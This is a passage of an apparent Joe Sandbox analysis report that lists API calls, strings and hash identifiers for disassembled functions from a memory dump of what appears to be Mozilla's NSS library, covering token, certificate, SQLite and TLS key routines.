                                                                                                                                                                                                                                                                                                                      • Opcode ID: d3716a8a2c21ba8f7b9bc4ff6428a9b308097dffd4f322978bee38166be61f84
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 08649f6067f4d38755548123a668c93a9b99a42835f581f750ff41d7041f8f70
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3716a8a2c21ba8f7b9bc4ff6428a9b308097dffd4f322978bee38166be61f84
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95E16B716083019FE710CF28CA80B5AB7F5AF4930CF24496DE9AA9BB51E731E845CB53
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6CE51C6B
                                                                                                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6CE51C75
                                                                                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6CE51CA1
                                                                                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 6CE51CA9
                                                                                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000000), ref: 6CE51CB4
                                                                                                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 6CE51CCC
                                                                                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6CE51CE4
                                                                                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 6CE51CEC
                                                                                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000000), ref: 6CE51CFD
                                                                                                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 6CE51D0F
                                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6CE51D17
                                                                                                                                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32 ref: 6CE51D4D
                                                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6CE51D73
                                                                                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6CE51D7F
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6CE51D7A
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                                                                                                                                                                                                                                                                                      • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                                                                                                                                                                                                                                                                                      • API String ID: 3748115541-1216436346
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 85428c8fc2aead74173e8127936a823702e59f91dca58dbedbb891fc4864d622
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7bd94bfb38b51b0af8b970dd3d60fef67228df3ea2bdc8cc34dc3e91f54c8098
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85428c8fc2aead74173e8127936a823702e59f91dca58dbedbb891fc4864d622
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 783152B5E102189FEF50AF64DC88BAB7BB8FF4A345F004065FA0992250E7315994CF69
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6CE53DFB
                                                                                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 6CE53EEC
                                                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CE53FA3
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000001), ref: 6CE54047
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CE540DE
                                                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CE5415F
                                                                                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 6CE5416B
                                                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CE54288
                                                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CE542AB
                                                                                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 6CE542B7
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
                                                                                                                                                                                                                                                                                                                      • String ID: %02d$%03d$%04d$%lld
                                                                                                                                                                                                                                                                                                                      • API String ID: 703928654-3678606288
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8312045404b1983137f015e3fdd3443d41e8d96a8d7e05c0feecdff28ee6f3e6
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 81524b7de18c4f3102d31c76559b217312cda383f50ebb3df92c4eb95bb38bb4
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8312045404b1983137f015e3fdd3443d41e8d96a8d7e05c0feecdff28ee6f3e6
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88F15571A087409FD715CF38C841BABB7F6AF86308F648A1EF48597750E732D8668B52
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE5EF63
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE687D0: PORT_NewArena_Util.NSS3(00000800,6CE5EF74,00000000), ref: 6CE687E8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE687D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6CE5EF74,00000000), ref: 6CE687FD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE687D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CE6884C
                                                                                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6CE5F2D4
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE5F2FC
                                                                                                                                                                                                                                                                                                                      • SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6CE5F30F
                                                                                                                                                                                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6CE5F374
                                                                                                                                                                                                                                                                                                                      • PL_strcasecmp.NSS3(6CFA2FD4,?), ref: 6CE5F457
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6CE5F4D2
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CE5F66E
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE007,00000000), ref: 6CE5F67D
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyName.NSS3(?), ref: 6CE5F68B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE68320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6CE68338
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE68320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CE68364
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE68320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6CE6838E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE68320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6CE683A5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE68320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE683E3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE684C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6CE684D9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE684C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CE68528
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE68900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6CE5F599,?,00000000), ref: 6CE68955
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
                                                                                                                                                                                                                                                                                                                      • String ID: "$*$oid.
                                                                                                                                                                                                                                                                                                                      • API String ID: 4161946812-2398207183
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 53c3bf4b4c256313d20bba1229540eed151fd12479693409e71d2bed8f0784dc
                                                                                                                                                                                                                                                                                                                      • Instruction ID: bfebf67d084d0fa30807d535418f64337c0479972826c0158f4d241c63121990
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53c3bf4b4c256313d20bba1229540eed151fd12479693409e71d2bed8f0784dc
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43224A7160C3508BD710CE28C49076AB7F6AB8531CFB84A2EE49587B95E77B9C16C783
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE01D58
                                                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CE01EFD
                                                                                                                                                                                                                                                                                                                      • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6CE01FB7
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • table, xrefs: 6CE01C8B
                                                                                                                                                                                                                                                                                                                      • another row available, xrefs: 6CE02287
                                                                                                                                                                                                                                                                                                                      • abort due to ROLLBACK, xrefs: 6CE02223
                                                                                                                                                                                                                                                                                                                      • sqlite_temp_master, xrefs: 6CE01C5C
                                                                                                                                                                                                                                                                                                                      • no more rows available, xrefs: 6CE02264
                                                                                                                                                                                                                                                                                                                      • sqlite_master, xrefs: 6CE01C61
                                                                                                                                                                                                                                                                                                                      • unsupported file format, xrefs: 6CE02188
                                                                                                                                                                                                                                                                                                                      • unknown error, xrefs: 6CE02291
                                                                                                                                                                                                                                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 6CE020CA
                                                                                                                                                                                                                                                                                                                      • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6CE01F83
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                                                                                                                                                                                                                                                                                      • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                                                                                                                                                                                                                                                                                      • API String ID: 563213449-2102270813
                                                                                                                                                                                                                                                                                                                      • Opcode ID: ace9437599a8fd6a1d05fc634f9671a6611c3714f3e70a605acc0d5dd13b288f
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 67b3d4f9cf47f0e5bfdd37e40842a97182dba9fef2b7dcaacc903dd7bd688302
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ace9437599a8fd6a1d05fc634f9671a6611c3714f3e70a605acc0d5dd13b288f
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B129A707083019FD705CF59C08465AB7F2BF9931CF29896DE8898BB52D731E85ACB92
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                      • String ID: -$-$2$BINARY$NOCASE$ON clause references tables to its right$sub-select returns %d columns - expected %d$u
                                                                                                                                                                                                                                                                                                                      • API String ID: 0-3593521594
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 09960eb8aaa7c286eec67216686e32efe1c72376a9f8a54637cb7a44e50e562d
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8932cef58e68a0d0d72f1fc985ef951d6ea64dff12648316c8cbadffe9ff4c15
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09960eb8aaa7c286eec67216686e32efe1c72376a9f8a54637cb7a44e50e562d
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 334382756083418FD314CF18C490B5AB7F2BF8931CF248A6DE8998B756D739E846CB92
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CECC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CECDAE2,?), ref: 6CECC6C2
                                                                                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CECF0AE
                                                                                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CECF0C8
                                                                                                                                                                                                                                                                                                                      • PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6CECF101
                                                                                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CECF11D
                                                                                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6CF9218C), ref: 6CECF183
                                                                                                                                                                                                                                                                                                                      • SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6CECF19A
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CECF1CB
                                                                                                                                                                                                                                                                                                                      • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CECF1EF
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CECF210
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE752D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6CECF1E9,?,00000000,?,?), ref: 6CE752F5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE752D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6CE7530F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE752D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6CE75326
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE752D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6CECF1E9,?,00000000,?,?), ref: 6CE75340
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CECF227
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFAB0: free.MOZGLUE(?,-00000001,?,?,6CE5F673,00000000,00000000), ref: 6CEBFAC7
                                                                                                                                                                                                                                                                                                                      • SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6CECF23E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CE6E708,00000000,00000000,00000004,00000000), ref: 6CEBBE6A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CE704DC,?), ref: 6CEBBE7E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CEBBEC2
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CECF2BB
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE006,00000000), ref: 6CECF3A8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CECF3B3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE72D20: PK11_DestroyObject.NSS3(?,?), ref: 6CE72D3C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE72D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CE72D5F
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1559028977-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: cd0e2a14a92e547fec5126d8c931f9a385909e9ea47a11c513920c6643450b80
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 20284df35df9f2eb4f47bb8b023c3847ffc2d9652a9bc8f297c02690f1787c9b
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd0e2a14a92e547fec5126d8c931f9a385909e9ea47a11c513920c6643450b80
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2D17FB6F012059FDB14CF99DA80A9EB7F5EF4830CF258029D925A7711E735E806CB51
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(FF000001,?,?,?,00000000,6CED7FFA,00000000,?,6CF023B9,00000002,00000000,?,6CED7FFA,00000002), ref: 6CEFDE33
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF290AB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF290C9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: EnterCriticalSection.KERNEL32 ref: 6CF290E5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF29116
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: LeaveCriticalSection.KERNEL32 ref: 6CF2913F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEFD000: PORT_ZAlloc_Util.NSS3(00000108,?,6CEFDE74,6CED7FFA,00000002,?,?,?,?,?,00000000,6CED7FFA,00000000,?,6CF023B9,00000002), ref: 6CEFD008
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(FF000001,?,?,?,?,?,00000000,6CED7FFA,00000000,?,6CF023B9,00000002,00000000,?,6CED7FFA,00000002), ref: 6CEFDE57
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000088), ref: 6CEFDEA5
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CEFE069
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CEFE121
                                                                                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?), ref: 6CEFE14F
                                                                                                                                                                                                                                                                                                                      • PK11_CreateContextBySymKey.NSS3(?,00000000,?,00000000), ref: 6CEFE195
                                                                                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6CEFE1FC
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEF2460: PR_SetError.NSS3(FFFFE005,00000000,6CF97379,00000002,?), ref: 6CEF2493
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: ErrorValue$CriticalEnterK11_MonitorSection$Alloc_ContextCreateCurrentExitFreeLeaveThreadUtilmemset
                                                                                                                                                                                                                                                                                                                      • String ID: application data$early application data$handshake data$key
                                                                                                                                                                                                                                                                                                                      • API String ID: 1461918828-2699248424
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9f8994ed2291dd168f5f2706675e60328491f43023ab9cce1796cafba3f45d84
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7423381224cd7c9bbceba15a7c16343939edbfa8255ee68d9bfd7bfd054311d5
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f8994ed2291dd168f5f2706675e60328491f43023ab9cce1796cafba3f45d84
